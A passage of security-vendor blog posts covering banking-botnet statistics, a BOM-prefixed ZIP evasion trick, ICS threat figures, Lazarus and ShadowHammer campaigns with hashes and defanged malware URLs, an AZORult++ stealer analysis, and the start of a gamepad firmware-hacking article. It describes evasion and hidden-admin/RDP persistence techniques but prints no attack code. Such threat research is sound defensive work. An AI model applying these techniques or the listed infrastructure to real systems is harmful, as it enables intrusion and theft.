  1. An attempt is made to infect a device with malware (if the botmaster’s aim is financial, a Trojan banker is deployed). If successful, the malware-infected device becomes part of the botnet under the control of a C&C center.
  2. The malware on the infected device receives a command from C&C containing the target mask (for example, the URL of an online banking service) and other data required for the attack.
  3. Having received the command, the malware monitors the actions of the user of the infected device and carries out the attack when that user visits a resource that matches the target mask.

Main types of botnet-assisted attacks are:

Unlike DDoS attacks, which affect the web resources of the victim organization, the attacks investigated in this report target the clients of the organization. The result of a successful attack can be:

  • Interception of user credentials
  • Interception of bank card data
  • Substitution of the transaction addressee (for example, the recipient of a banking transaction)
  • Another operation performed without the user’s knowledge, but in their name

Such scenarios are valid not only for the user’s bank accounts, but for other services too, as we shall see later.


Kaspersky Lab tracks botnet actions using the Botnet Monitoring technology, which emulates infected computers (bots) to obtain real-time data on the actions of botnet operators.

This analysis includes unique attacks registered by Botnet Monitoring in 2017 and 2018 and revealed by analysis of intercepted bots’ configurational files and C&C command.

The attack target is the URL mask, extracted from the bot configuration file or the intercepted command (for example, the URL mask of an online banking site).

The ‘malware family’ in this report refers to publicly known names of malware, for example, ZeuS, TrickBot (Trickster), Cridex (Dridex, Feodo, Geodo, etc.), Ramnit (Nimnul).

Examples of target masks contained in registered commands

A unique attack in this analysis is taken as the unique combination of the target mask and the malware family (or its modification) that received the attack command. The rest of the data (injected scripts, rules for cryptowallets or URLs substitution, traffic redirection rules, patterns for credentials interception, etc.) were not taken into account when determining the uniqueness of an attack.

Excluded from the analysis are attacks related to company resources engaged in developing anti-malware solutions, since such attacks are security measures undertaken by malware to prevent treatment of an infected device (to prevent downloading of a security solution). Besides, we excluded attacks in which could not uniquely identify the target, i.e. it was impossible to obtain additional information about the target from the target mask (for example, the “* bank *” target of the BetaBot is not included in the analysis).

Only the number of unique attacks is taken into account, and not the total number of attacks of each particular family, because different families may receive commands with different frequencies.

The results are based on an analysis of commands from more than 60,000 different C&C centers linked to 150 malware families and their modifications.


The total number of unique attacks on clients of organizations registered by Botnet Monitoring technology in 2018 fell by 23.46% against the previous year (from 20 009 attacks in 2017 to 15 314 in 2018).

At the same time, 39.35% of the attacks we observed in 2018 were new, that is, the combination of the target mask and the family that received the attack command was not encountered in 2017. This is linked to both the emergence of new bankers (Danabot, BackSwap) and the desire of malware creators to change their target scope.

The geography of attacks’ targets in 2017 covered 111 countries; in 2018, attempts were made to attack clients of organizations in 101 countries.

Cybercriminals’ targets

To start with, we will examine the clients of which organizations are cybercriminals’ preferred targets.

In 2017, the largest share of attack targets belonged to the Financial Services category (77.44%). This includes online banking services, multibanking services, online stores, and other resources related to financial transactions (not including cryptocurrencies). This result is to be expected due to the greatest potential gains for the cybercriminals, who in the event of a successful attack gain direct access to the victim’s finances.

In second place by number of unique attacks is the Global Portals and Social Networks category (6.15%), which includes search engines, email services, and social networks. Search engines are placed in this group, because typically the main page of such systems provides a mailbox login form through which intruders try to steal credentials using the types of attacks described above.

Third place in our ranking goes to resources that provide various products and services (5.08%), but are not online stores. For example, hosting providers. In this case, as in the first category, the target is victims’ payment details. These resources are assigned to a separate group, since they offer a specific product or service, which indicates how precise the cybercriminals’ targeting can be.

Distribution of the number of unique attacks by attack target, 2017

Distribution of the number of unique attacks by attack target, 2018

In 2018, there were minor changes in the Top 3 targets of attacks on clients of various organizations. Interestingly, the share of unique attacks on financial services dropped by 3.51 p.p. to 73.93%.

The target mask received by the bot nearly always contains a domain or part of one. After analyzing the domains of masks pertaining to financial organizations (banks, investment, credit, pension institutions, etc.), we compiled a map of organizations whose clients were attacked by bots in 2018. The map indicates the numbers of financial organization domains observed in commands sent to bots.

It should be noted that one organization can own several domains, for example, divided according to a country’s territories.

Domain map of financial organizations observed in target masks, 2018

2018 saw a rise in botmasters’ interest in cryptocurrencies: The number of unique attacks on users linked to cryptocurrency services (exchanges, cryptocurrency wallets, etc.) increased, with their share more than tripling (up 4.95 p.p.) to 7.25%.

Cybercriminals actively tried to monetize interest in cryptocurrencies and obtain data from victims to steal funds. The majority of attacks that we detected on users of cryptocurrency services featured Ramnit Banker (53%). In addition, the Chthonic and Panda bankers, both modifications of the notorious ZeuS banker, dramatically increased the number of unique masks linked to cryptocurrency wallets and exchanges. The CapCoiner Trojan, which specifically targets such resources, also displayed major activity in this area.

Distribution of Trojans families by share of attacks on users of cryptocurrency services, 2018

Geography of attack targets

Note: If the target mask contains a TLD (top-level domain) that can be used to determine the country, this country is entered in the statistics. If the country cannot be determined from the TLD (for example, .com), the country where the organization’s headquarters are located is entered in the statistics.

In 2018, the ranking of Top 10 countries by number of unique target masks changed order, but not composition. As in the previous year, clients of organizations in the US were the most frequent targets of attacks in 2018.

2017 2018 1 United States 31.29% United States 34.84% 2 Germany 11.15% Britain 9.97% 3 Britain 9.20% Italy 7.46% 4 Italy 7.52% Canada 6.16% 5 Canada 6.96% Germany 3.88% 6 Australia 4.67% Spain 3.14% 7 France 4.57% Switzerland 3.04% 8 Spain 2.87% France 3.02% 9 China 2.50% Australia 2.29% 10 Switzerland 2.17% China 2.11%

In 2018, the share of unique attacks on clients of organizations located in Germany fell significantly. This is because in 2017 most of these attacks were carried out by BetaBot (almost 75% of all registered unique attacks), while in 2018 its share barely exceeded 1.5%. Even with Danabot attacks registered in 2018 on clients of German banks, Germany still couldn’t retain second place in our ranking.

Geography of attack targets, 2017

Among the other changes observed was a decline in the share of attacked clients of Australian organizations from 4.67% to 2.29%. Almost all bots reduced the number of unique masks focused on Australia. For instance, among the Gozi banker attacks we observed in 2018, there were practically none against clients of financial organizations in Australia, whereas in 2017 they accounted for more than 90% of registered attacks by this malware.

Geography of attack targets, 2018

But it’s not all good news. Many varieties of malware expanded their geography: In 2018, the Trickster (TrickBot) banker added no fewer than 11 countries to its target list, while the SpyEye Trojan and the IcedID banker picked up 9 and 5 more countries, respectively.

Unsurprisingly, the most frequently attacked users of cryptocurrency services were located in the US, Luxembourg, and China, since many cryptocurrency services are registered in these countries. In addition, the number of attacks in 2018 on users of services registered in Britain, Singapore, Estonia, South Korea, and Switzerland climbed significantly.

Geography of cryptocurrency services whose users were attacked, 2017

Geography of cryptocurrency services whose users were attacked, 2018

Geography of C&C centers

This section gives statistics on the geography of botnet C&C centers that sent commands to launch an attack.

In 2017, the largest slice of C&C centers was located in Ukraine (24.25%), with almost 60% of them made up of C&C servers for the abovementioned Gozi banker.

Geography of C&C centers in 2017

In 2018, Russia (29.61%) was top of the leaderboard by number of C&C centers directing attacks against clients of various organizations. More than half (54%) of these C&C centers were used by the Panda banker.

Geography of C&C centers, 2018

Most active families BetaBot

Trojan Banker BetaBot accounted for 13.25% of all unique attacks in 2018.

Geography of BetaBot targets, 2018

Key features (shares relative to the number of unique BetaBot attacks):

  • Geography of targets: 42 countries
  • Most attacked countries: US (73.60%), China (6.35%), Britain (6.11%)
  • Most attacked categories of organizations: Financial Services (37.43%), Global Portals and Social Networks (18.16%)
Trickster (TrickBot)

The TrickBot banker accounted for 12.85% of all unique attacks in 2018.

Geography of TrickBot targets, 2018

Key features (shares relative to the number of unique TrickBot attacks):

  • Geography of targets: 65 countries
  • Most attacked countries: Britain (11.02%), US (9.34%), Germany (7.99%)
  • Most attacked categories of organizations: Financial Services (96.97%), Cryptocurrency Services (1.72%)

The Panda banker accounted for 9.84% of all unique attacks in 2018.

Geography of Panda targets, 2018

Key features (shares relative to the number of unique Panda attacks):

  • Geography of targets: 33 countries
  • Most attacked countries: Canada (24.89%), US (22.93%), Italy (17.90%)
  • Most attacked categories of organizations: Financial Services (80.88%), Cryptocurrency Services (10.26%)

SpyEye accounted for 8.05% of all unique attacks in 2018.

Geography of SpyEye targets, 2018

Key features (shares relative to the number of unique SpyEye attacks):

  • Geography of targets: 32 countries
  • Most attacked countries: US (35.01%), Britain (14.38%), Germany (13.57%)
  • Most attacked categories of organizations: Financial Services (98.04%)

Ramnit accounted for 7.97% of all unique attacks in 2018 registered by Botnet Monitoring. Ramnit’s impressive geography covers 66 countries.

Geography of Ramnit targets, 2018

Key features (shares relative to the number of unique Ramnit attacks):

  • Geography of targets: 66 countries
  • Most attacked countries: Britain (25.70%), US (20.12%), China (7.78%)
  • Most attacked categories of organizations: Financial Services (47.76%), Cryptocurrency Services (46.83%)

Our analysis of commands issued to attack clients of organizations in 2018 identified the following main trends:

  • The reduction in the total number of registered unique attacks may indicate cybercriminals’ preference to create target masks that cover a large number of resources of one organization and stay relevant for a prolonged period.
  • Absolute majority of attacks still targets financial organizations and their clients.
  • The number of attacks on clients of cryptocurrency services increased significantly (compared to 2017). The number of such attacks is not expected to fall; on the contrary, it may rise given that more and more bots are deploying web injections against such resources.
  • New target masks are proliferating. Cybercriminals are adding new, previously unencountered targets as well as modifying old masks to cover more websites where user data or money can be stolen.

The return of the BOM

28 Březen, 2019 - 16:00

There’s nothing new in Brazilian cybercriminals trying out new ways to stay under the radar. It’s just that this time around the bad guys have started using a method that was reported in the wild years ago.

Russian gangs used this technique to distribute malware capable of modifying the hosts file on Windows systems. Published by McAfee in 2013, the UTF-8 BOM (Byte Order Mark) additional bytes helped these malicious crews avoid detection.

Since these campaigns depended on spear phishing to increase the victim count, the challenge was to fool email scanners and use a seemingly corrupted file that lands in the victim’s inbox.

The first indicator appears when the user tries to open the ZIP file with the default file explorer and sees the following error:

The error message suggests the file is corrupt, but when we check its contents we see something strange in there.

Zip header prefixed by UTF-8 BOM

Instead of having the normal ZIP header starting with the “PK” signature (0x504B), we have three extra bytes (0xEFBBBF) that represent the Byte Order Mark (BOM) usually found within UTF-8 text files. Some tools will not recognize this file as being a ZIP archive format, but will instead recognize it as an UTF-8 text file and fail to extract the malicious payload.

However, utilities such as WinRAR and 7-Zip ignore this data and extract the content correctly. Once the user extracts the file with any of these utilities they can execute it and infect the system.

The file is successfully extracted by WinRAR

The malicious executable acts as a loader for the main payload which is embedded in the resource section.

Resource table showing the resource containing the encrypted data

Encrypted DLL stored in resource section

The content stored inside the resource, encrypted with a XOR-based algorithm, is commonly seen in different malware samples from Brazil. The decrypted resource is a DLL that will load and execute the exported function “BICDAT”.

Code used to load the extracted DLL and execute the exported function BICDAT

This library will then download a second stage payload which is a password-protected ZIP file and encrypted with the same function as the embedded payload. After extracting all the files, the loader will then launch the main executable.

Code executed by BICDAT function

Strings related to Banking RAT malware

The final payload that’s delivered is a variant of a Banking RAT malware, which is currently widespread in Brazil and Chile.

Kaspersky Lab products can extract and analyze compressed ZIP files containing the Byte Order Mark without any problem.

Indicators of compromise


Threat Landscape for Industrial Automation Systems in H2 2018

27 Březen, 2019 - 12:00

H2 2018 in figures

All statistical data used in this report was collected using the Kaspersky Security Network (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions.

In H2 2018:

  • Kaspersky Lab products prevented malicious activity on 40.8% of ICS computers.
  • Kaspersky Lab security solutions detected over 19.1 thousand malware modifications from 2.7 thousand different families on industrial automation systems. As before, in the overwhelming majority of cases, attempted infections of ICS computers are random rather than parts of targeted attacks.
  • Trojan malware remains the most prevalent among threats that are relevant to ICS computers. Malware of this class was detected on 27.1% of ICS computers. The malicious activity of exploits was prevented on 3.2% of ICS computers,
  • backdoors were blocked on 3.1%,
  • ransomware – on 2% of ICS computers.

Percentage of ICS computers on which malicious objects of different classes were prevented, 2017 – 2018

  • In each month of 2018, the proportion of ICS computers on which malicious activity was prevented was higher than that in the same month of 2017.

Percentage of ICS computers on which malicious objects were detected

  • Countries with the highest proportions of ICS computers on which malicious objects were detected during H2 2018 were Vietnam (70.1%), Algeria (69.9%), and Tunisia (64.6%).
  • The most secure countries are Ireland (11.7%), Switzerland (14.9%), Denmark (15.2%), Hong Kong (15.3%), the UK (15.7%), and the Netherlands (15.7%).

Percentage of ICS computers on which malicious objects were detected in different countries of the world

  • As in the past years, the main sources of threats to computers in the industrial infrastructure of organizations are the internet (26.1%), removable media (8.3%), and email (4.9%).

Percentage of ICS computers on which malicious objects from different sources were detected

  • The percentage of ICS computers on which malicious email attachments were blocked has increased in nearly all regions of the world. This change probably reflects the growth in the number of phishing attacks on industrial enterprises in H2 2018.

Percentage of ICS computers on which malicious email attachments were blocked in different regions of the world

  • Phishing attacks are the main vector of targeted attacks on industrial companies. Malicious attachments from phishing emails pose a danger not only to office computers but also to some of the computers in the industrial infrastructure: Trojan-spy, backdoor and keylogger malware was blocked at least on 4.3% of ICS computers globally. All of these types of malware often show up in the phishing emails sent to industrial enterprises.
  • Western Europe (5.1%) is, surprisingly, one of the TOP 3 regions based on the percentage of ICS computers on which malicious email attachments were blocked. This is in large part due to the percentage for Germany nearly doubling (from 3.6% to 6.5%).
Vulnerabilities identified by Kaspersky Lab ICS CERT in 2018

Kaspersky Lab ICS CERT experts continued the previous year’s research on security issues affecting third-party hardware-based and software solutions that are widely used in industrial automation systems. A particular emphasis was placed on open-source products used in various vendors’ solutions. Analyzing car software for vulnerabilities became a new area of research for Kaspersky Lab ICS CERT.

  • In 2018, Kaspersky Lab ICS CERT identified 61 vulnerabilities in industrial and IIoT/IoT systems. Vendors closed 29 of these vulnerabilities during the year.

Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2018 by types of components analyzed

  • 46% of the vulnerabilities identified, if exploited, could lead to remote execution of arbitrary code on the target system or a denial-of-service (DoS) condition. A significant part of the vulnerabilities (21%) could also enable an attacker to bypass authentication.

Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2018 by possible exploitation consequences

  • During 2018, 37 CVE entries were published based on information about vulnerabilities identified by Kaspersky Lab ICS CERT (information on 15 vulnerabilities closed in 2018 had been provided to vendors in 2017).
  • The absolute majority of those vulnerabilities identified by Kaspersky Lab ICS CERT for which CVEs were published in 2018 have CVSS v.3 base scores of 7.0 or more, which places them in the most severe group. Seven of these vulnerabilities were assigned the highest possible base score of 10. These include vulnerabilities in third-party software, and LibVNCServer and LibVNCClient cross-platform solutions.

You can find information on the key events of H2 2018, an overview of vulnerabilities published during the year, and detailed statistics in the full version of the report on the Kaspersky Lab ICS CERT website.

Cryptocurrency businesses still being targeted by Lazarus

26 Březen, 2019 - 16:00

It’s hardly news to anyone who follows cyberthreat intelligence that the Lazarus APT group targets financial entities, especially cryptocurrency exchanges. Financial gain remains one of the main goals for Lazarus, with its tactics, techniques, and procedures constantly evolving to avoid detection.

In the middle of 2018, we published our Operation Applejeus research, which highlighted Lazarus’s focus on cryptocurrency exchanges utilizing a fake company with a backdoored product aimed at cryptocurrency businesses. One of the key findings was the group’s new ability to target macOS. Since then Lazarus has been busy expanding its operations for the platform.

Further tracking of their activities targeting the financial sector enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and macOS malware for Apple users.

Infection procedure

Lazarus is a well-organized group, something that can be seen from their malware population: not only have we seen them build redundancy to reserve some malware in case of in-operation hot spare replacement of ‘burnt’ (detected) samples but they also conform to specific internal standards and protocols when developing backdoors. This case is no different. They have developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator. The C2 server script names are disguised as WordPress (popular blog engine) files as well as those of other popular open source projects. After establishing the malware control session with the server, the functionality provided by the malware includes:

  • Set sleep time (delay between C2 interactions)
  • Exit malware
  • Collect basic host information
  • Check malware status
  • Show current malware configuration
  • Update malware configuration
  • Execute system shell command
  • Download & Upload files

Lazarus uses different tactics to run its C2 servers: from purchasing servers to using hacked ones. We have seen some legitimate-looking servers that are most likely compromised and used in malicious campaigns. According to server response headers, they are most likely running an old vulnerable instance of Internet Information Services (IIS) 6.0 on Microsoft Windows Server 2003. Another C2 server was probably purchased by Lazarus from a hosting company and used to host macOS and Windows payloads. The geography of the servers varies, from China to the European Union. But why use two different types of servers? The group seems to have a rule (at least in this campaign) to only host malware on rented servers, while hosting C2 scripts for malware communication on compromised servers.

Infrastructure segregation by purpose

The malware was distributed via documents carefully prepared to attract the attention of cryptocurrency professionals. Seeing as how some of the documents were prepared in Korean, we believe that South Korean businesses are a high priority for Lazarus. One document entitled ‘Sample document for business plan evaluation of venture company’ (translated from Korean) looks like this:

Content of weaponized document from Lazarus (4cbd45fe6d65f513447beb4509a9ae3d)

Another macro-weaponized document (e9a6a945803722be1556fd120ee81199) contains a business overview of what seems to be a Chinese technology consulting group named LAFIZ. We couldn’t confirm if it’s a legitimate business or another fake company made up by Lazarus. Their website lafiz[.]link has been parked since 2017.

Contents of another weaponized document (e9a6a945803722be1556fd120ee81199)

Based on our telemetry, we found a cryptocurrency exchange company attacked with a malicious document containing the same macro. The document’s content provided information for coin listings with a translation in Korean:

Content of another weaponized document (6a0f3abd05bc75edbfb862739865a4cc)

The payloads show that Lazarus keeps exploring more ways to evade detection to stay under the radar longer. The group builds malware for 32-bit and 64-bit Windows separately to support both platforms and have more variety in terms of compiled code. The Windows payloads distributed from the server (nzssdm[.]com) hosting the Mac malware have a CheckSelf export function, and one of them (668d5b5761755c9d061da74cb21a8b75) has the internal name ‘battle64.dll’. From that point we managed to find additional Windows malware samples containing the CheckSelf export function and an internal name containing the word ‘battle’.

These Windows malware samples were delivered using malicious HWP (Korean Hangul Word Processor format) documents exploiting a known PostScript vulnerability. It should be noted that HWP documents are only popular among Korean users (Hangul Word Processor was developed in South Korea) and we have witnessed several attacks using the same method.

Connection with previous HWP attacks

It’s no secret that Apple products are now very popular among successful internet startups and fintech companies, and this is why the malicious actor built and used macOS malware. While investigating earlier Lazarus incidents, we anticipated this actor would eventually expand its attacks to macOS.

It appears that Lazarus is using the same developers to expand to other platforms, because some of the features have remained consistent as its malware evolves.

Overlap of current campaign and previous hwp-based attack cases

We’d therefore like to ask Windows and macOS users to be more cautious and not fall victim to Lazarus. If you’re part of the booming cryptocurrency or technological startup industry, exercise extra caution when dealing with new third parties or installing software on your systems. It’s best to check new software with an antivirus or at least use popular free virus-scanning services such as VirusTotal. And never ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources. Avoid being infected by fake or backdoored software from Lazarus – if you need to try out new applications, it’s better do so offline or on an isolated network virtual machine which you can erase with a few clicks. We’ll continue posting on Lazarus’s latest tactics and tricks in our blog. In the meantime, stay safe!

For more details on this and other research, please contact intelreports@kaspersky.com.

File Hashes:

Malicious office document used in real attack
4cbd45fe6d65f513447beb4509a9ae3d 샘플_기술사업계획서(벤처기업평가용).doc
6a0f3abd05bc75edbfb862739865a4cc 문의_Evaluation Table.xls

Testing office document
29a37c6d9fae5664946c6607f351a8dc list.doc
e9a6a945803722be1556fd120ee81199 list.doc
a18bc8bc82bca8245838274907e64631 list.doc

macOS malware

PowerShell script
cb713385655e9af0a2fc10da5c0256f5 test.ps1
e6d5363091e63e35490ad2d76b72e851 test.ps1 – It does not contain URLs.

Windows executable payload
171b9135540f89bf727b690b9e587a4e wwtm.dat
668d5b5761755c9d061da74cb21a8b75 wwtm.dat

Manuscrypt payload

Malicious hwp file
F392492ef5ea1b399b4c0af38810b0d6 일일동향보고_180913.hwp
0316f6067bc02c23c1975d83c659da21 국가핵심인력등록관리제등검토요청(10.16)(김경환변호사).hwp

Domains and IPs

Compromised first stage C2 server

Second stage C2 server
http://115.28.160[.]20:443 – Compromised server

Malware hosting server
http://nzssdm[.]com/assets/wwtm.dat – Windows payload distribution URL
http://nzssdm[.]com/assets/mt.dat – Mac payload distribution URL

Operation ShadowHammer

25 Březen, 2019 - 15:01

Earlier today, Motherboard published a story by Kim Zetter on Operation ShadowHammer, a newly discovered supply chain attack that leveraged ASUS Live Update software.

While the investigation is still in progress and full results and technical paper will be published during SAS 2019 conference in Singapore, we would like to share some important details about the attack.

In January 2019, we discovered a sophisticated supply chain attack involving the ASUS Live Update Utility. The attack took place between June and November 2018 and according to our telemetry, it affected a large number of users.

ASUS Live Update is an utility that is pre-installed on most ASUS computers and is used to automatically update certain components such as BIOS, UEFI, drivers and applications. According to Gartner, ASUS is the world’s 5th-largest PC vendor by 2017 unit sales. This makes it an extremely attractive target for APT groups that might want to take advantage of their userbase.

Based on our statistics, over 57,000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update at some point in time. We are not able to calculate the total count of affected users based only on our data; however, we estimate that the real scale of the problem is much bigger and is possibly affecting over a million users worldwide.

The goal of the attack was to surgically target an unknown pool of users, which were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.

We believe this to be a very sophisticated supply chain attack, which matches or even surpasses the Shadowpad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly due to the fact that the trojanized updaters were signed with legitimate certificates (eg: “ASUSTeK Computer Inc.”). The malicious updaters were hosted on the official liveupdate01s.asus[.]com and liveupdate01.asus[.]com ASUS update servers.

Digital signature on a trojanized ASUS Live Update setup installer
Certificate serial number: 05e6a0be5ac359c7ff11f4b467ab20fc

We have contacted ASUS and informed them about the attack on Jan 31, 2019, supporting their investigation with IOCs and descriptions of the malware.

Although precise attribution is not available at the moment, certain evidence we have collected allows us to link this attack to the ShadowPad incident from 2017. The actor behind the ShadowPad incident has been publicly identified by Microsoft in court documents as BARIUM. BARIUM is an APT actor known to be using the Winnti backdoor. Recently, our colleagues from ESET wrote about another supply chain attack in which BARIUM was also involved, that we believe is connected to this case as well.

A victim distribution by country for the compromised ASUS Live Updater looks as follows:

It should be noted that the numbers are also highly influenced by the distribution of Kaspersky users around the world. In principle, the distribution of victims should match the distribution of ASUS users around the world.

We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found.

Download an archive with the tool (.exe)

Also, you may check MAC addresses online. If you discover that you have been targeted by this operation, please e-mail us at: shadowhammer@kaspersky.com


Kaspersky Lab verdicts for the malware used in this and related attacks:

  • HEUR:Trojan.Win32.ShadowHammer.gen

Domains and IPs:

  • asushotfix[.]com
  • 141.105.71[.]116

Some of the URLs used to distribute the compromised packages:

  • hxxp://liveupdate01.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip
  • hxxps://liveupdate01s.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip
  • hxxps://liveupdate01s.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip
  • hxxps://liveupdate01s.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip

Hashes (Liveupdate_Test_VER365.zip):

  • aa15eb28292321b586c27d8401703494
  • bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19

A full set of IOCs and Yara rules is available to customers of Kaspersky Intelligence Reporting service – contact intelreports@kaspersky.com

AZORult++: Rewriting history

22 Březen, 2019 - 13:13

The AZORult Trojan is one of the most commonly bought and sold stealers in Russian forums. Despite the relatively high price tag ($100), buyers like AZORult for its broad functionality (for example, the use of .bit domains as C&C servers to ensure owner anonymity and to make it difficult to block the C&C server), as well as its high performance. Many comment leavers recommend it.

But at the back end of 2018, the main seller, known under the handle CrydBrox, stopped selling the malware:

“All software has a shelf life. It’s run out for AZORult.
It is with joy and sadness that I announce that sales are closed forever.”

Some attribute the move to AZORult 3.2 having become too widely available, likewise the source code of the botnet control panel. This version of the malware spread to other forums where even users without special skills can download and configure it for their own purposes. So the imminent demise of AZORult was apparently down to a lack of regular updates and its overly wide distribution. Yet the story of AZORult does not end there.

In a nutshell

AZORult is a Trojan stealer that collects various data on infected computers and sends it to the C&C server, including browser history, login credentials, cookies, files from folders as specified by the C&C server (for example, all TXT files from the Desktop folder), cryptowallet files, etc.; the malware can also be used as a loader to download other malware. Kaspersky Lab products detect the stealer as Trojan-PSW.Win32.Azorult. Our statistics show that since the start of 2019, users in Russia and India are the most targeted.

Geography of users attacked by Trojan-PSW.Win32.Azorult, 01.01.2019 — 03.18.2019

From Delphi to C++

In early March 2019, a number of malicious files detected by our products caught the eye. Although similar to AZORult already known to us, unlike the original malware, they were written not in Delphi, but in C++. A clear hint at the link between them comes from a section of code left by the developer.

It appears that the acolytes of CrydBrox, the very one who pulled the plug on AZORult, decided to rewrite it in C++; this version we call AZORult++. The presence of lines containing a path to debugging files likely indicates that the malware is still in development, since developers usually try to remove such code as soon as feasible.

AZORult++ starts out by checking the language ID through a call to the GetUserDefaultLangID() function. If AZORult++ is running on a system where the language is identified as Russian, Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Tajik, Turkmen, or Uzbek, the malware stops executing.

A more detailed analysis reveals that the C++ version is deficient compared to AZORult 3.3, the last iteration to be sold. In particular, there is no loader functionality and no support for stealing saved passwords from many of the browsers supported by AZORult 3.3. At the same time, many signature features of the Delphi-based version 3.3 are present in AZORult++, including the algorithm for communication with the C&C server, the command format, the structure and method of storing harvested data, and encryption keys.

Like AZORult 3.3, AZORult++ uses an XOR operation with a 3-byte key to encrypt data sent to the C&C server. What’s more, this key we had already encountered in various modifications of version 3.3.

Examples of different versions of AZORult in operation (data encrypted using XOR)

The malware collects stolen data in RAM and does not write to the hard drive to keep its actions hidden. A comparison of the data sent in the first packet (the ID of the infected device) shows that AZORult++ uses a shorter string than AZORult 3.3 for identification:

The server response also contains far less data. In version 3.3, the response contained a command in the form “++++-+–+-“, specifying the bot configuration and a link for downloading additional malware, plus several binary files needed for the stealer to work. The string “++++-+–+-” is parsed by the Trojan character-by-character; “+” in a specific position signifies a command to execute certain actions (for example, harvesting of cryptowallet files). The current version of AZORult++ employs a shorter, yet similar command:

It is worth mentioning separately that the resulting configuration string is not processed correctly; the code execution does not depend on the value “+” or “-” in the string, since the characters are checked against \x00 for a match. In other words, the resulting command does not affect the stealer’s behavior:

This seems to be an error on the part of the developer, which suggests again that the project is in the very early stages of development. Going forward, these bugs are expected to be eliminated and the functionality of AZORult++ expanded.

++ up the sleeve

For all its flaws, AZORult++ could actually be more dangerous than its predecessor due to its ability to establish a remote connection to the desktop. To do so, AZORult++ creates a user account using the NetUserAdd() function (username and password are specified in the AZORult++ code), before adding this account to the Administrators group:

Next, AZORult++ hides the newly created account by setting the value of the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist registry key to 0. Likewise, through setting registry key values, a Remote Desktop Protocol (RDP) connection is allowed:

The malicious cherry on the cake is a call to ShellExecuteW() to open a port to establish a remote connection to the desktop:

After that, the infected computer is ready to accept the incoming RDP connection, which allows the cybercriminal — armed with the victim’s IP address and account information — to connect to the infected computer and seize complete control of it.


During development, AZORult underwent several changes related to the expansion of its functionality. Moreover, despite its many flaws, the C++ version is already more threatening than its predecessor due to the ability to establish a remote connection to the desktop. Because AZORult++ is likely still in development, we should expect its functionality to expand and bugs to be eliminated, not to mention attempts to distribute it widely under a name that buyers will recognize.


C&C servers


Hacking microcontroller firmware through a USB

21 Březen, 2019 - 18:00

In this article, I want to demonstrate extracting the firmware from a secure USB device running on the Cortex M0.

Who hacks video game consoles?

The manufacture of counterfeit and unlicensed products is widespread in the world of video game consoles. It’s a multi-billion dollar industry in which demand creates supply. You can now find devices for almost all the existing consoles that allow you to play copies of licensed video game ‘backups’ from flash drives, counterfeit gamepads and accessories, various adapters, some of which give you an advantage over other players, and devices for the use of cheats in online and offline video games. There are even services that let you buy video game achievements without having to spend hours playing. Of course, this is all sold without the consent of the video game console manufacturers.

Modern video game consoles, just like 20 years ago, are proprietary systems where the rules are set by the hardware manufacturers, and not by the millions of customers using those devices. A variety of protective measures are included in their design to ensure these consoles only run signed code, so they only play licensed and legally acquired video games and all players have equal rights and only play with officially licensed accessories. In some countries it’s even illegal to try and hack your own video game console.

But at the same time the very scale of the protection makes these consoles an attractive target and one big ‘crackme’ for enthusiasts interested in information security and reverse engineering. The more difficult the puzzle, the more interesting it is to solve. Especially if you’ve grown up with a love for video games.

Protection scheme of DualShock 4

Readers who follow my twitter account may know that I’m a long-time fan of reverse engineering video game consoles and everything related to them, including unofficial game devices. In the early days of PlayStation 4, a publicly known vulnerability in the FreeBSD kernel (which PlayStation 4 is based on) let me and many other researchers take a look at the architecture and inner workings of the new game console from Sony. I carried out a lot different research, some of which included looking at how USB authentication works in PlayStation 4 and how it distinguishes licensed devices and blocks unauthorized devices. This subject was of interest because I had previously done similar research on other consoles. PlayStation 4’s authentication scheme turned out to be much simpler than that used in Xbox 360, but no less effective.

Authorization scheme of PlayStation 4 USB accessories

PS4 sends 0x100 random bytes to DualShock 4 and in response the gamepad creates an RSASSA-PSS SHA-256 signature and sends it back among the cryptographic constants N and E (public key) needed to verify it. These constants are unique for all manufactured DualShock 4 gamepads. The gamepad also sends a signature needed for verification of N and E. It uses the same RSASSA-PSS SHA-256 algorithm, but the cryptographic constants are equal for all PlayStation 4 consoles and are stored in the kernel.

This means that if you want to authenticate your own USB device, it’s not enough to hack the PlayStation 4 kernel – you need the private key stored inside the gamepad. And even if someone manages to hack a gamepad and obtains the private key, Sony can still blacklist the key with a firmware update. If after eight minutes a game console has not received an authentication response it stops communication with the gamepad and you need to remove it from the USB port and plug it in again to get it to work. That’s how the early counterfeit gamepads worked by simulating a USB port unplug/plug process every eight minutes, and it was very annoying for anyone who bought them.

Rumors of super counterfeit DualShock 4

There were no signs of anyone hacking this authentication scheme for quite some time until I heard rumors about new fake gamepads on the market that looked and worked just like the original. I really wanted to take a look at them, so I ordered a few from Chinese stores.

While I was waiting for my parcels to arrive, I decided to try and gather more information about counterfeit gamepads. After quite a few search requests I found a gamepad known as Gator Claw.

Unauthorized Gator Claw gamepad

